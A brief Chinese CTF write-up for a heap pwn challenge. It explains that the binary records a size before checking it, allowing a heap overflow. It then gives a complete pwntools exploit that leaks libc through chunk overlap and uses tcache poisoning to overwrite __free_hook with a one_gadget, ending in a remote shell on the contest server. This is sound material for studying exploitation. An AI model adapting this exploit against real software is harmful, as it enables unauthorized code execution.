baigei
思路
第一次比赛里做出pwn题。。。
add函数里对输入的size进行检测前就写入了size记录数组,导致edit堆溢出
用了overlap泄露libc
然后tcachepoisoning改free_hook为onegadget
wp
from pwn import *
s = lambda data :p.send(data)
sa = lambda text,data :p.sendafter(text, str(data))
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda text :p.recvuntil(text)
uu32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg = lambda name,data :p.success(name + "-> 0x%x" % data)
context.log_level ='debug'
test =0
if test == 1 :
p = process('./main')
else:
p = remote('113.201.14.253','21111')
elf = ELF('./main')
libc = elf.libc
def cmd(choice):
sla('>>\n',choice)
def add(idx,size,content):
cmd(1)
sla('idx?\n',idx)
sla('size?\n',size)
p.sendafter('content?\n',content)
def badadd(idx,size):
cmd(1)
sla('idx?\n',idx)
sla('size?\n',size)
def edit(idx,size,content):
cmd(3)
sla('idx?\n',idx)
sla('size?\n',size)
p.sendafter('content?\n',content)
def show(idx):
cmd(4)
sla('idx?\n',idx)
def delete(idx):
cmd(2)
sla('idx?\n',idx)
def dbg():
gdb.attach(p)
pause()
for i in range(0,10):
add(i,0xf0,'a')
for i in range(0,6):
delete(i)
delete(9)
delete(6)
delete(7)
delete(8)
for i in range(0,7):
add(i,0xf0,'a')
add(7,0xf0,'a')
add(8,0xf0,'a')
add(9,0xf0,'a')
for i in range(0,6):
delete(i)
delete(8)
delete(7)
add(8,0xf0,'a')
badadd(8,0x500)
edit(8,0x400,'\x00'*0xf0+p64(0x200)+p64(0x100))
delete(6)
delete(9)
for i in range(0,7):
add(i,0xf0,'a')
add(7,0xf0,'a')
show(8)
libc_base = uu64()-96-0x3EBC40
lg('libc_base',libc_base)
free_hook = libc.sym['__free_hook']+libc_base
one = libc_base + 0x4f432
add(9,0xf0,'a')
delete(9)
badadd(7,0x500)
edit(7,0x400,'\x00'*0xf8+p64(0x101)+p64(free_hook))
add(1,0xf0,'a')
add(2,0xf0,p64(one))
delete(3)
p.interactive()